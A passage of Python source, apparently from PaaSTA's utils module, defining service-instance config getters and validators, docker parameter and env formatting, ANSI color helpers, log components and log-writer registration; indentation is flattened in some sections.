return self.service
@property
def job_id(self) -> str:
return self._job_id
def get_docker_registry(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
return get_service_docker_registry(
self.service, self.soa_dir, system_config=system_paasta_config
)
def get_branch(self) -> str:
return get_paasta_branch(
cluster=self.get_cluster(), instance=self.get_instance()
)
def get_deploy_group(self) -> str:
return self.config_dict.get("deploy_group", self.get_branch())
def get_team(self) -> str:
return self.config_dict.get("monitoring", {}).get("team", None)
def get_mem(self) -> float:
"""Gets the memory required from the service's configuration.
Defaults to 4096 (4G) if no value specified in the config.
:returns: The amount of memory specified by the config, 4096 if not specified"""
mem = self.config_dict.get("mem", 4096)
return mem
def get_mem_swap(self) -> str:
"""Gets the memory-swap value. This value is passed to the docker
container to ensure that the total memory limit (memory + swap) is the
same value as the 'mem' key in soa-configs. Note - this value *has* to
be >= to the mem key, so we always round up to the closest MB and add
additional 64MB for the docker executor (See PAASTA-12450).
"""
mem = self.get_mem()
mem_swap = int(math.ceil(mem + 64))
return "%sm" % mem_swap
def get_cpus(self) -> float:
"""Gets the number of cpus required from the service's configuration.
Defaults to 1 cpu if no value specified in the config.
:returns: The number of cpus specified in the config, 1 if not specified"""
cpus = self.config_dict.get("cpus", 1)
return cpus
def get_cpu_burst_add(self) -> float:
"""Returns the number of additional cpus a container is allowed to use.
Defaults to DEFAULT_CPU_BURST_ADD"""
return self.config_dict.get("cpu_burst_add", DEFAULT_CPU_BURST_ADD)
def get_cpu_period(self) -> float:
"""The --cpu-period option to be passed to docker
Comes from the cfs_period_us configuration option
:returns: The number to be passed to the --cpu-period docker flag"""
return self.config_dict.get("cfs_period_us", DEFAULT_CPU_PERIOD)
def get_cpu_quota(self) -> float:
"""Gets the --cpu-quota option to be passed to docker
Calculation: (cpus + cpus_burst_add) * cfs_period_us
:returns: The number to be passed to the --cpu-quota docker flag"""
cpu_burst_add = self.get_cpu_burst_add()
return (self.get_cpus() + cpu_burst_add) * self.get_cpu_period()
def get_extra_docker_args(self) -> Dict[str, str]:
return self.config_dict.get("extra_docker_args", {})
def get_cap_add(self) -> Iterable[DockerParameter]:
"""Get the --cap-add options to be passed to docker
Generated from the cap_add configuration option, which is a list of
capabilities.
Example configuration: {'cap_add': ['IPC_LOCK', 'SYS_PTRACE']}
:returns: A generator of cap_add options to be passed as --cap-add flags"""
for value in self.config_dict.get("cap_add", []):
yield {"key": "cap-add", "value": f"{value}"}
def get_cap_drop(self) -> Iterable[DockerParameter]:
"""Generates --cap-drop options to be passed to docker by default, which
makes them not able to perform special privilege escalation stuff
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
"""
for cap in CAPS_DROP:
yield {"key": "cap-drop", "value": cap}
    def format_docker_parameters(
        self,
        with_labels: bool = True,
        system_paasta_config: Optional["SystemPaastaConfig"] = None,
    ) -> List[DockerParameter]:
        """Formats extra flags for running docker. Will be added in the format
        `["--%s=%s" % (e['key'], e['value']) for e in list]` to the `docker run` command
        Note: values must be strings

        :param with_labels: Whether to build docker parameters with or without labels
        :returns: A list of parameters to be added to docker run"""
        # Resource limits derived from mem/cpus in soa-configs.
        parameters: List[DockerParameter] = [
            {"key": "memory-swap", "value": self.get_mem_swap()},
            {"key": "cpu-period", "value": "%s" % int(self.get_cpu_period())},
            {"key": "cpu-quota", "value": "%s" % int(self.get_cpu_quota())},
        ]
        if self.use_docker_disk_quota(system_paasta_config=system_paasta_config):
            # Enforce the configured disk limit via docker's storage-opt
            # (disk is in MiB; storage-opt size is in bytes).
            parameters.append(
                {
                    "key": "storage-opt",
                    "value": f"size={int(self.get_disk() * 1024 * 1024)}",
                }
            )
        if with_labels:
            # Labels let other tooling map a running container back to its
            # paasta service/instance.
            parameters.extend(
                [
                    {"key": "label", "value": "paasta_service=%s" % self.service},
                    {"key": "label", "value": "paasta_instance=%s" % self.instance},
                ]
            )
        extra_docker_args = self.get_extra_docker_args()
        if extra_docker_args:
            for key, value in extra_docker_args.items():
                parameters.extend([{"key": key, "value": value}])
        parameters.extend(self.get_cap_add())
        parameters.extend(self.get_docker_init())
        parameters.extend(self.get_cap_drop())
        return parameters
def use_docker_disk_quota(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> bool:
if system_paasta_config is None:
system_paasta_config = load_system_paasta_config()
return system_paasta_config.get_enforce_disk_quota()
def get_docker_init(self) -> Iterable[DockerParameter]:
return [{"key": "init", "value": "true"}]
def get_disk(self, default: float = 1024) -> float:
"""Gets the amount of disk space in MiB required from the service's configuration.
Defaults to 1024 (1GiB) if no value is specified in the config.
:returns: The amount of disk space specified by the config, 1024 MiB if not specified"""
disk = self.config_dict.get("disk", default)
return disk
def get_gpus(self) -> Optional[int]:
"""Gets the number of gpus required from the service's configuration.
Default to None if no value is specified in the config.
:returns: The number of gpus specified by the config, 0 if not specified"""
gpus = self.config_dict.get("gpus", None)
return gpus
def get_container_type(self) -> Optional[str]:
"""Get Mesos containerizer type.
Default to DOCKER if gpus are not used.
:returns: Mesos containerizer type, DOCKER or MESOS"""
if self.get_gpus() is not None:
container_type = "MESOS"
else:
container_type = "DOCKER"
return container_type
def get_cmd(self) -> Optional[Union[str, List[str]]]:
"""Get the docker cmd specified in the service's configuration.
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("cmd", None)
def get_instance_type(self) -> Optional[str]:
return getattr(self, "config_filename_prefix", None)
    def get_env_dictionary(
        self, system_paasta_config: Optional["SystemPaastaConfig"] = None
    ) -> Dict[str, str]:
        """A dictionary of key/value pairs that represent environment variables
        to be injected to the container environment.

        User-supplied `env` values from soa-configs override the generated
        PAASTA_* variables; all keys and values are coerced to str.
        """
        env = {
            "PAASTA_SERVICE": self.service,
            "PAASTA_INSTANCE": self.instance,
            "PAASTA_CLUSTER": self.cluster,
            "PAASTA_DEPLOY_GROUP": self.get_deploy_group(),
            "PAASTA_DOCKER_IMAGE": self.get_docker_image(),
            "PAASTA_RESOURCE_CPUS": str(self.get_cpus()),
            "PAASTA_RESOURCE_MEM": str(self.get_mem()),
            "PAASTA_RESOURCE_DISK": str(self.get_disk()),
        }
        if self.get_gpus() is not None:
            env["PAASTA_RESOURCE_GPUS"] = str(self.get_gpus())
        try:
            env["PAASTA_GIT_SHA"] = get_git_sha_from_dockerurl(
                self.get_docker_url(system_paasta_config=system_paasta_config)
            )
        except Exception:
            # Best effort: e.g. NoDockerImageError when no image has been
            # deployed yet; the variable is simply omitted.
            pass
        team = self.get_team()
        if team:
            env["PAASTA_MONITORING_TEAM"] = team
        instance_type = self.get_instance_type()
        if instance_type:
            env["PAASTA_INSTANCE_TYPE"] = instance_type
        # User env from soa-configs wins over the generated values above.
        user_env = self.config_dict.get("env", {})
        env.update(user_env)
        return {str(k): str(v) for (k, v) in env.items()}
def get_env(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> Dict[str, str]:
"""Basic get_env that simply returns the basic env, other classes
might need to override this getter for more implementation-specific
env getting"""
return self.get_env_dictionary(system_paasta_config=system_paasta_config)
def get_args(self) -> Optional[List[str]]:
"""Get the docker args specified in the service's configuration.
If not specified in the config and if cmd is not specified, defaults to an empty array.
If not specified in the config but cmd is specified, defaults to null.
If specified in the config and if cmd is also specified, throws an exception. Only one may be specified.
:param service_config: The service instance's configuration dictionary
:returns: An array of args specified in the config,
``[]`` if not specified and if cmd is not specified,
otherwise None if not specified but cmd is specified"""
if self.get_cmd() is None:
return self.config_dict.get("args", [])
else:
args = self.config_dict.get("args", None)
if args is None:
return args
else:
# TODO validation stuff like this should be moved into a check_*
raise InvalidInstanceConfig(
"Instance configuration can specify cmd or args, but not both."
)
def get_monitoring(self) -> MonitoringDict:
"""Get monitoring overrides defined for the given instance"""
return self.config_dict.get("monitoring", {})
def get_deploy_constraints(
self,
blacklist: DeployBlacklist,
whitelist: DeployWhitelist,
system_deploy_blacklist: DeployBlacklist,
system_deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Return the combination of deploy_blacklist and deploy_whitelist
as a list of constraints.
"""
return (
deploy_blacklist_to_constraints(blacklist)
+ deploy_whitelist_to_constraints(whitelist)
+ deploy_blacklist_to_constraints(system_deploy_blacklist)
+ deploy_whitelist_to_constraints(system_deploy_whitelist)
)
def get_deploy_blacklist(self) -> DeployBlacklist:
"""The deploy blacklist is a list of lists, where the lists indicate
which locations the service should not be deployed"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""The deploy whitelist is a tuple of (location_type, [allowed value, allowed value, ...]).
To have tasks scheduled on it, a host must be covered by the deploy whitelist (if present) and not excluded by
the deploy blacklist."""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_docker_image(self) -> str:
"""Get the docker image name (with tag) for a given service branch from
a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["docker_image"]
else:
return ""
def get_docker_url(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
"""Compose the docker url.
:returns: '<registry_uri>/<docker_image>'
"""
registry_uri = self.get_docker_registry(
system_paasta_config=system_paasta_config
)
docker_image = self.get_docker_image()
if not docker_image:
raise NoDockerImageError(
"Docker url not available because there is no docker_image"
)
docker_url = f"{registry_uri}/{docker_image}"
return docker_url
def get_desired_state(self) -> str:
"""Get the desired state (either 'start' or 'stop') for a given service
branch from a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["desired_state"]
else:
return "start"
def get_force_bounce(self) -> Optional[str]:
"""Get the force_bounce token for a given service branch from a generated
deployments.json file. This is a token that, when changed, indicates that
the instance should be recreated and bounced, even if no other
parameters have changed. This may be None or a string, generally a
timestamp.
"""
if self.branch_dict is not None:
return self.branch_dict["force_bounce"]
else:
return None
def check_cpus(self) -> Tuple[bool, str]:
cpus = self.get_cpus()
if cpus is not None:
if not isinstance(cpus, (float, int)):
return (
False,
'The specified cpus value "%s" is not a valid float or int.' % cpus,
)
return True, ""
def check_mem(self) -> Tuple[bool, str]:
mem = self.get_mem()
if mem is not None:
if not isinstance(mem, (float, int)):
return (
False,
'The specified mem value "%s" is not a valid float or int.' % mem,
)
return True, ""
def check_disk(self) -> Tuple[bool, str]:
disk = self.get_disk()
if disk is not None:
if not isinstance(disk, (float, int)):
return (
False,
'The specified disk value "%s" is not a valid float or int.' % disk,
)
return True, ""
def check_security(self) -> Tuple[bool, str]:
security = self.config_dict.get("security")
if security is None:
return True, ""
inbound_firewall = security.get("inbound_firewall")
outbound_firewall = security.get("outbound_firewall")
if inbound_firewall is None and outbound_firewall is None:
return True, ""
if inbound_firewall is not None and inbound_firewall not in (
"allow",
"reject",
):
return (
False,
'Unrecognized inbound_firewall value "%s"' % inbound_firewall,
)
if outbound_firewall is not None and outbound_firewall not in (
"block",
"monitor",
):
return (
False,
'Unrecognized outbound_firewall value "%s"' % outbound_firewall,
)
unknown_keys = set(security.keys()) - {
"inbound_firewall",
"outbound_firewall",
}
if unknown_keys:
return (
False,
'Unrecognized items in security dict of service config: "%s"'
% ",".join(unknown_keys),
)
return True, ""
def check_dependencies_reference(self) -> Tuple[bool, str]:
dependencies_reference = self.config_dict.get("dependencies_reference")
if dependencies_reference is None:
return True, ""
dependencies = self.config_dict.get("dependencies")
if dependencies is None:
return (
False,
'dependencies_reference "%s" declared but no dependencies found'
% dependencies_reference,
)
if dependencies_reference not in dependencies:
return (
False,
'dependencies_reference "%s" not found in dependencies dictionary'
% dependencies_reference,
)
return True, ""
def check(self, param: str) -> Tuple[bool, str]:
check_methods = {
"cpus": self.check_cpus,
"mem": self.check_mem,
"security": self.check_security,
"dependencies_reference": self.check_dependencies_reference,
"deploy_group": self.check_deploy_group,
}
check_method = check_methods.get(param)
if check_method is not None:
return check_method()
else:
return (
False,
'Your service config specifies "%s", an unsupported parameter.' % param,
)
def validate(self, params: Optional[List[str]] = None,) -> List[str]:
if params is None:
params = [
"cpus",
"mem",
"security",
"dependencies_reference",
"deploy_group",
]
error_msgs = []
for param in params:
check_passed, check_msg = self.check(param)
if not check_passed:
error_msgs.append(check_msg)
return error_msgs
def check_deploy_group(self) -> Tuple[bool, str]:
deploy_group = self.get_deploy_group()
if deploy_group is not None:
pipeline_deploy_groups = get_pipeline_deploy_groups(
service=self.service, soa_dir=self.soa_dir
)
if deploy_group not in pipeline_deploy_groups:
return (
False,
f"{self.service}.{self.instance} uses deploy_group {deploy_group}, but it is not deploy.yaml",
) # noqa: E501
return True, ""
def get_extra_volumes(self) -> List[DockerVolume]:
"""Extra volumes are a specially formatted list of dictionaries that should
be bind mounted in a container The format of the dictionaries should
conform to the `Mesos container volumes spec
<https://mesosphere.github.io/marathon/docs/native-docker.html>`_"""
return self.config_dict.get("extra_volumes", [])
def get_aws_ebs_volumes(self) -> List[AwsEbsVolume]:
return self.config_dict.get("aws_ebs_volumes", [])
def get_secret_volumes(self) -> List[SecretVolume]:
return self.config_dict.get("secret_volumes", [])
def get_role(self) -> Optional[str]:
"""Which mesos role of nodes this job should run on.
"""
return self.config_dict.get("role")
def get_pool(self) -> str:
"""Which pool of nodes this job should run on. This can be used to mitigate noisy neighbors, by putting
particularly noisy or noise-sensitive jobs into different pools.
This is implemented with an attribute "pool" on each mesos slave and by adding a constraint or node selector.
Eventually this may be implemented with Mesos roles, once a framework can register under multiple roles.
:returns: the "pool" attribute in your config dict, or the string "default" if not specified."""
return self.config_dict.get("pool", "default")
def get_pool_constraints(self) -> List[Constraint]:
pool = self.get_pool()
return [["pool", "LIKE", pool]]
def get_constraints(self) -> Optional[List[Constraint]]:
return stringify_constraints(self.config_dict.get("constraints", None))
def get_extra_constraints(self) -> List[Constraint]:
return stringify_constraints(self.config_dict.get("extra_constraints", []))
def get_net(self) -> str:
"""
:returns: the docker networking mode the container should be started with.
"""
return self.config_dict.get("net", "bridge")
def get_volumes(self, system_volumes: Sequence[DockerVolume]) -> List[DockerVolume]:
volumes = list(system_volumes) + list(self.get_extra_volumes())
return _reorder_docker_volumes(volumes)
def get_persistent_volumes(self) -> Sequence[PersistentVolume]:
return self.config_dict.get("persistent_volumes", [])
def get_dependencies_reference(self) -> Optional[str]:
"""Get the reference to an entry in dependencies.yaml
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("dependencies_reference")
def get_dependencies(self) -> Optional[Dict]:
"""Get the contents of the dependencies_dict pointed to by the dependency_reference or
'main' if no dependency_reference exists
Defaults to None if not specified in the config.
:returns: A list of dictionaries specified in the dependencies_dict, None if not specified"""
dependencies = self.config_dict.get("dependencies")
if not dependencies:
return None
dependency_ref = self.get_dependencies_reference() or "main"
return dependencies.get(dependency_ref)
def get_inbound_firewall(self) -> Optional[str]:
"""Return 'allow', 'reject', or None as configured in security->inbound_firewall
Defaults to None if not specified in the config
Setting this to a value other than `allow` is uncommon, as doing so will restrict the
availability of your service. The only other supported value is `reject` currently,
which will reject all remaining inbound traffic to the service port after all other rules.
This option exists primarily for sensitive services that wish to opt into this functionality.
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("inbound_firewall")
def get_outbound_firewall(self) -> Optional[str]:
"""Return 'block', 'monitor', or None as configured in security->outbound_firewall
Defaults to None if not specified in the config
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("outbound_firewall")
def __eq__(self, other: Any) -> bool:
if isinstance(other, type(self)):
return (
self.config_dict == other.config_dict
and self.branch_dict == other.branch_dict
and self.cluster == other.cluster
and self.instance == other.instance
and self.service == other.service
)
else:
return False
def stringify_constraint(usc: UnstringifiedConstraint) -> Constraint:
    """Convert one constraint's elements (which may be ints/floats from
    YAML) to strings, since Marathon only accepts string constraints."""
    return [str(x) for x in usc]


def stringify_constraints(
    uscs: Optional[List[UnstringifiedConstraint]],
) -> Optional[List[Constraint]]:
    """Stringify each constraint in the list; None passes through unchanged.

    Return annotation fixed to Optional[List[Constraint]] -- the previous
    List[Constraint] annotation was wrong for the explicit None return.
    """
    if uscs is None:
        return None
    return [stringify_constraint(usc) for usc in uscs]
@time_cache(ttl=60)
def validate_service_instance(
    service: str, instance: str, cluster: str, soa_dir: str
) -> str:
    """Return the instance type (marathon, kubernetes, tron, ...) that
    service.instance is configured as on the given cluster.

    Results are cached for 60 seconds.  Raises
    NoConfigurationForServiceError -- with "did you mean" suggestions built
    from every instance name seen -- when no instance type matches.
    """
    possibilities: List[str] = []
    for instance_type in INSTANCE_TYPES:
        sis = get_service_instance_list(
            service=service,
            cluster=cluster,
            instance_type=instance_type,
            soa_dir=soa_dir,
        )
        if (service, instance) in sis:
            return instance_type
        # Remember every instance name we saw so the error below can
        # suggest near-misses.
        possibilities.extend(si[1] for si in sis)
    else:
        # NOTE(review): the loop has no `break`, so this for/else branch is
        # equivalent to plain fall-through code after the loop.
        suggestions = suggest_possibilities(word=instance, possibilities=possibilities)
        raise NoConfigurationForServiceError(
            f"Error: {compose_job_id(service, instance)} doesn't look like it has been configured "
            f"to run on the {cluster} cluster.{suggestions}"
        )
_ComposeRetT = TypeVar("_ComposeRetT")
_ComposeInnerRetT = TypeVar("_ComposeInnerRetT")


def compose(
    func_one: Callable[[_ComposeInnerRetT], _ComposeRetT],
    func_two: Callable[..., _ComposeInnerRetT],
) -> Callable[..., _ComposeRetT]:
    """Return a callable applying ``func_two`` first, then ``func_one``."""

    def chained(*args: Any, **kwargs: Any) -> _ComposeRetT:
        inner_result = func_two(*args, **kwargs)
        return func_one(inner_result)

    return chained
class PaastaColors:

    """Collection of static variables and methods to assist in coloring text."""

    # ANSI color codes
    BLUE = "\033[34m"
    BOLD = "\033[1m"
    CYAN = "\033[36m"
    DEFAULT = "\033[0m"
    GREEN = "\033[32m"
    GREY = "\033[38;5;242m"
    MAGENTA = "\033[35m"
    RED = "\033[31m"
    YELLOW = "\033[33m"

    @staticmethod
    def bold(text: str) -> str:
        """Return bolded text.

        :param text: a string
        :return: text color coded with ANSI bold
        """
        return PaastaColors.color_text(PaastaColors.BOLD, text)

    @staticmethod
    def blue(text: str) -> str:
        """Return text that can be printed blue.

        :param text: a string
        :return: text color coded with ANSI blue
        """
        return PaastaColors.color_text(PaastaColors.BLUE, text)

    @staticmethod
    def green(text: str) -> str:
        """Return text that can be printed green.

        :param text: a string
        :return: text color coded with ANSI green"""
        return PaastaColors.color_text(PaastaColors.GREEN, text)

    @staticmethod
    def red(text: str) -> str:
        """Return text that can be printed red.

        :param text: a string
        :return: text color coded with ANSI red"""
        return PaastaColors.color_text(PaastaColors.RED, text)

    @staticmethod
    def magenta(text: str) -> str:
        """Return text that can be printed magenta.

        :param text: a string
        :return: text color coded with ANSI magenta"""
        return PaastaColors.color_text(PaastaColors.MAGENTA, text)

    @staticmethod
    def color_text(color: str, text: str) -> str:
        """Return text that can be printed color.

        :param color: ANSI color code
        :param text: a string
        :return: a string with ANSI color encoding"""
        # any time text returns to default, we want to insert our color.
        replaced = text.replace(PaastaColors.DEFAULT, PaastaColors.DEFAULT + color)
        # then wrap the beginning and end in our color/default.
        return color + replaced + PaastaColors.DEFAULT

    @staticmethod
    def cyan(text: str) -> str:
        """Return text that can be printed cyan.

        :param text: a string
        :return: text color coded with ANSI cyan"""
        return PaastaColors.color_text(PaastaColors.CYAN, text)

    @staticmethod
    def yellow(text: str) -> str:
        """Return text that can be printed yellow.

        :param text: a string
        :return: text color coded with ANSI yellow"""
        return PaastaColors.color_text(PaastaColors.YELLOW, text)

    @staticmethod
    def grey(text: str) -> str:
        """Return text that can be printed grey (256-color ANSI code)."""
        return PaastaColors.color_text(PaastaColors.GREY, text)

    @staticmethod
    def default(text: str) -> str:
        """Return text wrapped in the terminal's default color reset."""
        return PaastaColors.color_text(PaastaColors.DEFAULT, text)
# Registry of known log components: maps component name -> display color and
# help text (plus optional scribe source-env hints). Consumed by
# validate_log_component() and the paasta logs tooling.
LOG_COMPONENTS: Mapping[str, Mapping[str, Any]] = OrderedDict(
    [
        (
            "build",
            {
                "color": PaastaColors.blue,
                "help": (
                    "Logs for pre-deployment steps, such as itests, "
                    "image building, and security checks."
                ),
                "source_env": "devc",
            },
        ),
        (
            "deploy",
            {
                "color": PaastaColors.cyan,
                "help": (
                    "Logs for deployment steps and actions, such as "
                    "bouncing, start/stop/restart, and instance cleanup."
                ),
                "additional_source_envs": ["devc"],
            },
        ),
        (
            "monitoring",
            {
                "color": PaastaColors.green,
                "help": "Logs from Sensu checks for the service",
            },
        ),
        (
            "marathon",
            {
                "color": PaastaColors.magenta,
                "help": "Logs from Marathon for the service (deprecated).",
            },
        ),
        (
            "app_output",
            {
                # Bold yellow: composed so it stands out among other components.
                "color": compose(PaastaColors.yellow, PaastaColors.bold),
                "help": (
                    "Stderr and stdout from a service's running processes. "
                    "Alias for both the stdout and stderr components."
                ),
            },
        ),
        (
            "stdout",
            {
                "color": PaastaColors.yellow,
                "help": "Stdout from a service's running processes.",
            },
        ),
        (
            "stderr",
            {
                "color": PaastaColors.yellow,
                "help": "Stderr from a service's running processes.",
            },
        ),
        (
            "security",
            {
                "color": PaastaColors.red,
                "help": "Logs from security-related services such as firewall monitoring",
            },
        ),
        ("oom", {"color": PaastaColors.red, "help": "Kernel OOM events."}),
        (
            "task_lifecycle",
            {
                "color": PaastaColors.bold,
                "help": "Logs that tell you about task startup, failures, healthchecks, etc.",
            },
        ),
        # I'm leaving these planned components here since they provide some hints
        # about where we want to go. See PAASTA-78.
        #
        # But I'm commenting them out so they don't delude users into believing we
        # can expose logs that we cannot actually expose. See PAASTA-927.
        #
        # ('app_request', {
        #     'color': PaastaColors.bold,
        #     'help': 'The request log for the service. Defaults to "service_NAME_requests"',
        #     'command': 'scribe_reader -e ENV -f service_example_happyhour_requests',
        # }),
        # ('app_errors', {
        #     'color': PaastaColors.red,
        #     'help': 'Application error log, defaults to "stream_service_NAME_errors"',
        #     'command': 'scribe_reader -e ENV -f stream_service_SERVICE_errors',
        # }),
        # ('lb_requests', {
        #     'color': PaastaColors.bold,
        #     'help': 'All requests from Smartstack haproxy',
        #     'command': 'NA - TODO: SRV-1130',
        # }),
        # ('lb_errors', {
        #     'color': PaastaColors.red,
        #     'help': 'Logs from Smartstack haproxy that have 400-500 error codes',
        #     'command': 'scribereader -e ENV -f stream_service_errors | grep SERVICE.instance',
        # }),
    ]
)
class NoSuchLogComponent(Exception):
    """Raised when a log component name is not present in LOG_COMPONENTS."""

    pass
def validate_log_component(component: str) -> bool:
    """Ensure ``component`` is a known log component.

    :param component: candidate component name, checked against LOG_COMPONENTS
    :returns: True if the component is valid
    :raises NoSuchLogComponent: if the component is unknown
    """
    # Membership test directly on the mapping; `.keys()` was redundant.
    if component in LOG_COMPONENTS:
        return True
    # Attach the offending name so the traceback is actionable.
    raise NoSuchLogComponent(component)
def get_git_url(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> str:
    """Get the git url for a service.

    Assumes that the service's repo matches its name and lives under
    ``services-``; e.g. calling this with ``'test'`` yields
    ``git@github.yelpcorp.com:services/test``.

    :param service: The service name to get a URL for
    :param soa_dir: directory containing the service's soa-configs
    :returns: A git url to the service's repository
    """
    service_config = service_configuration_lib.read_service_configuration(
        service, soa_dir=soa_dir
    )
    # TODO: PAASTA-16927: get this from system config `.git_config`
    fallback = format_git_url("git", "github.yelpcorp.com", f"services/{service}")
    return service_config.get("git_url", fallback)
def format_git_url(git_user: str, git_server: str, repo_name: str) -> str:
    """Build an SCP-style git URL of the form ``user@server:repo``."""
    return "{user}@{server}:{repo}".format(
        user=git_user, server=git_server, repo=repo_name
    )
def get_service_docker_registry(
    service: str,
    soa_dir: str = DEFAULT_SOA_DIR,
    system_config: Optional["SystemPaastaConfig"] = None,
) -> str:
    """Resolve the docker registry for a service.

    Prefers the service's own ``docker_registry`` soa-config key, falling
    back to the system-wide registry from the system paasta config.

    :raises NotImplementedError: if ``service`` is None
    """
    if service is None:
        raise NotImplementedError('"None" is not a valid service')
    service_configuration = service_configuration_lib.read_service_configuration(
        service, soa_dir
    )
    # Per-service override wins when present (even if explicitly null).
    if "docker_registry" in service_configuration:
        return service_configuration["docker_registry"]
    if not system_config:
        system_config = load_system_paasta_config()
    return system_config.get_system_docker_registry()
class NoSuchLogLevel(Exception):
    """Raised when a log call uses a level other than the supported ones
    (CLogWriter.log accepts only "event" and "debug")."""

    pass
class LogWriterConfig(TypedDict):
    """Shape of the `log_writer` section of the system paasta config."""

    driver: str
    options: Dict


class LogReaderConfig(TypedDict):
    """Shape of the `log_reader` section of the system paasta config."""

    driver: str
    options: Dict
# The active log writer; lazily instantiated by configure_log() on first use.
_log_writer = None
# The map of name -> LogWriter subclasses, populated by the
# @register_log_writer decorator and used by configure_log.
_log_writer_classes = {}
class LogWriter:
    """Abstract interface for paasta log writers.

    Concrete implementations are registered with @register_log_writer and
    selected at runtime by configure_log() from the system paasta config.
    """

    def __init__(self, **kwargs: Any) -> None:
        pass

    def log(
        self,
        service: str,
        line: str,
        component: str,
        level: str = DEFAULT_LOGLEVEL,
        cluster: str = ANY_CLUSTER,
        instance: str = ANY_INSTANCE,
    ) -> None:
        """Write one structured log line for a service/instance."""
        raise NotImplementedError()

    def log_audit(
        self,
        user: str,
        host: str,
        action: str,
        action_details: dict = None,
        service: str = None,
        cluster: str = ANY_CLUSTER,
        instance: str = ANY_INSTANCE,
    ) -> None:
        """Write one audit-trail entry describing an operator action."""
        raise NotImplementedError()
_LogWriterTypeT = TypeVar("_LogWriterTypeT", bound=Type[LogWriter])


def register_log_writer(name: str) -> Callable[[_LogWriterTypeT], _LogWriterTypeT]:
    """Returns a decorator that registers that log writer class at a given name
    so get_log_writer_class can find it."""

    def decorator(log_writer_cls: _LogWriterTypeT) -> _LogWriterTypeT:
        # Record the class in the module-level registry and hand it back
        # unchanged so it can still be used directly.
        _log_writer_classes[name] = log_writer_cls
        return log_writer_cls

    return decorator
def get_log_writer_class(name: str) -> Type[LogWriter]:
    """Look up a registered LogWriter class by driver name (KeyError if unknown)."""
    return _log_writer_classes[name]


def list_log_writers() -> Iterable[str]:
    """Return the names of all registered log writer drivers."""
    return _log_writer_classes.keys()
def configure_log() -> None:
    """We will log to the yocalhost binded scribe."""
    # Driver choice and options come from the system paasta config's
    # `log_writer` section; the instance is stashed in the module-global
    # _log_writer consumed by _log()/_log_audit().
    log_writer_config = load_system_paasta_config().get_log_writer()
    global _log_writer
    LogWriterClass = get_log_writer_class(log_writer_config["driver"])
    _log_writer = LogWriterClass(**log_writer_config.get("options", {}))
def _log(
    service: str,
    line: str,
    component: str,
    level: str = DEFAULT_LOGLEVEL,
    cluster: str = ANY_CLUSTER,
    instance: str = ANY_INSTANCE,
) -> None:
    """Forward one log line to the configured log writer,
    lazily configuring it on first use."""
    if _log_writer is None:
        configure_log()
    return _log_writer.log(
        service=service,
        line=line,
        component=component,
        level=level,
        cluster=cluster,
        instance=instance,
    )
def _log_audit(
    action: str,
    action_details: dict = None,
    service: str = None,
    cluster: str = ANY_CLUSTER,
    instance: str = ANY_INSTANCE,
) -> None:
    """Record an audit event via the configured log writer, stamping it with
    the current user and hostname."""
    if _log_writer is None:
        configure_log()
    user = get_username()
    host = get_hostname()
    return _log_writer.log_audit(
        user=user,
        host=host,
        action=action,
        action_details=action_details,
        service=service,
        cluster=cluster,
        instance=instance,
    )
def _now() -> str:
    """Current UTC time as a naive ISO-8601 string (no timezone offset).

    NOTE(review): datetime.utcnow() is deprecated as of Python 3.12; switching
    to datetime.now(timezone.utc) would append "+00:00" to the string and may
    affect log consumers -- confirm before changing.
    """
    return datetime.datetime.utcnow().isoformat()
def remove_ansi_escape_sequences(line: str) -> str:
    """Removes ansi escape sequences from the given line.

    Relies on the module-level compiled regex ``no_escape``.
    """
    return no_escape.sub("", line)
def format_log_line(
    level: str,
    cluster: str,
    service: str,
    instance: str,
    component: str,
    line: str,
    timestamp: str = None,
) -> str:
    """Accepts a string 'line'.

    Returns an appropriately-formatted dictionary which can be serialized to
    JSON for logging and which contains 'line'.

    :raises NoSuchLogComponent: if *component* is not a known log component
    """
    validate_log_component(component)
    record = {
        "timestamp": timestamp if timestamp else _now(),
        "level": level,
        "cluster": cluster,
        "service": service,
        "instance": instance,
        "component": component,
        # Strip surrounding whitespace and ANSI color codes so the JSON
        # payload carries clean text.
        "message": remove_ansi_escape_sequences(line.strip()),
    }
    return json.dumps(record, sort_keys=True)
def format_audit_log_line(
    cluster: str,
    instance: str,
    user: str,
    host: str,
    action: str,
    action_details: dict = None,
    service: str = None,
    timestamp: str = None,
) -> str:
    """Accepts:

    * a string 'user' describing the user that initiated the action
    * a string 'host' describing the server where the user initiated the action
    * a string 'action' describing an action performed by paasta_tools
    * a dict 'action_details' optional information about the action

    Returns an appropriately-formatted dictionary which can be serialized to
    JSON for logging and which contains details about an action performed on
    a service/instance.
    """
    record = {
        "timestamp": timestamp if timestamp else _now(),
        "cluster": cluster,
        "service": service,
        "instance": instance,
        "user": user,
        "host": host,
        "action": action,
        # Falsy/omitted details serialize as an empty object.
        "action_details": action_details if action_details else {},
    }
    return json.dumps(record, sort_keys=True)
def get_log_name_for_service(service: str, prefix: str = None) -> str:
    """Return the scribe stream name for a service's paasta logs.

    A truthy *prefix* is interposed between "stream_paasta_" and the
    service name.
    """
    return (
        f"stream_paasta_{prefix}_{service}" if prefix else f"stream_paasta_{service}"
    )
try:
    import clog

    # Somehow clog turns on DeprecationWarnings, so we need to disable them
    # again after importing it.
    warnings.filterwarnings("ignore", category=DeprecationWarning)

    class CLogWriter(LogWriter):
        """LogWriter backed by Yelp's clog library."""

        def __init__(self, **kwargs: Any):
            clog.config.configure(**kwargs)

        def log(
            self,
            service: str,
            line: str,
            component: str,
            level: str = DEFAULT_LOGLEVEL,
